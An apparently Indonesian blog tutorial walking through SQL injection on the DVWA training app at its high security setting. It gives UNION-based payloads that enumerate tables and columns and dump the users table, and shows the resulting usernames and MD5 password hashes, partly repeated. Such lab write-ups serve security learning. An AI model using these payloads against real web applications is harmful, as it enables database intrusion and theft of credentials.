Sql Injection Challenge Dvwa High Level Security
Monday, September 20, 2021
Add Comment
Banyak yang bilang SQL Inject di DVWA Level High 'impossible' untuk dipecahkan, alasannya yaitu kemungkinan hanya sanggup dibobol bila ditemuka teknik 0day. Padahal sesudah dicoba ternyata malah lebih gampang dari yang dibayangkan. hanya saja, kita harus melaksanakan inject secara manual , tidak sanggup memakai sqlmap menyerupai di level low ataupun medium.
Sebelum melaksanakan SQLi, pastikan dulu level security nya di set ke high. Ok, lets see how its work.
Saat kita menginput query 1' OR 1=1 , maka jadinya error.
1' OR 1=1 UNION SELECT null, version()#
1' OR 1=1 UNION SELECT null, table_name FROM INFORMATION_SCHEMA.tables WHERE table_name LIKE 'user%'#
1' OR 1=1 UNION SELECT null, column_name FROM INFORMATION_SCHEMA.columns WHERE table_name='users'#
Saatnya injeksi terakhir.
1' OR 1=1 UNION SELECT null, concat(user,0x0a,password) FROM users#
ID: 1' OR 1=1 UNION SELECT null, concat(user,0x0a,password) FROM users#
First name:
Surname: admin
fadd3eabf52e8a9b5ada3b210d666cc8
ID: 1' OR 1=1 UNION SELECT null, concat(user,0x0a,password) FROM users#
First name:
Surname: gordonb
e99a18c428cb38d5f260853678922e03
ID: 1' OR 1=1 UNION SELECT null, concat(user,0x0a,password) FROM users#
First name:
Surname: 1337
8d3533d75ae2c3966d7e0d4fcc69216b
ID: 1' OR 1=1 UNION SELECT null, concat(user,0x0a,password) FROM users#
First name:
Surname: pablo
0d107d09f5bbe40cade3de5c71e9e9b7
ID: 1' OR 1=1 UNION SELECT null, concat(user,0x0a,password) FROM users#
First name:
Surname: smithy
5f4dcc3b5aa765d61d8327deb882cf99
First name:
Surname: admin
fadd3eabf52e8a9b5ada3b210d666cc8
ID: 1' OR 1=1 UNION SELECT null, concat(user,0x0a,password) FROM users#
First name:
Surname: gordonb
e99a18c428cb38d5f260853678922e03
ID: 1' OR 1=1 UNION SELECT null, concat(user,0x0a,password) FROM users#
First name:
Surname: 1337
8d3533d75ae2c3966d7e0d4fcc69216b
ID: 1' OR 1=1 UNION SELECT null, concat(user,0x0a,password) FROM users#
First name:
Surname: pablo
0d107d09f5bbe40cade3de5c71e9e9b7
ID: 1' OR 1=1 UNION SELECT null, concat(user,0x0a,password) FROM users#
First name:
Surname: smithy
5f4dcc3b5aa765d61d8327deb882cf99
Target pwned.
Sekian tutor kali ini , agar bermanfaat.
NB :
Tutorial ini dilakukan memakai local server dan DVWA sehingga bukan tindakan illegal dan merugikan orang lain.
Sumber https://www.linuxsec.org/
0 Response to "Sql Injection Challenge Dvwa High Level Security"
Post a Comment
Blog ini merupakan Blog Dofollow, karena beberapa alasan tertentu, sobat bisa mencari backlink di blog ini dengan syarat :
1. Tidak mengandung SARA
2. Komentar SPAM dan JUNK akan dihapus
3. Tidak diperbolehkan menyertakan link aktif
4. Berkomentar dengan format (Name/URL)
NB: Jika ingin menuliskan kode pada komentar harap gunakan Tool untuk mengkonversi kode tersebut agar kode bisa muncul dan jelas atau gunakan tool dibawah "Konversi Kode di Sini!".
Klik subscribe by email agar Anda segera tahu balasan komentar Anda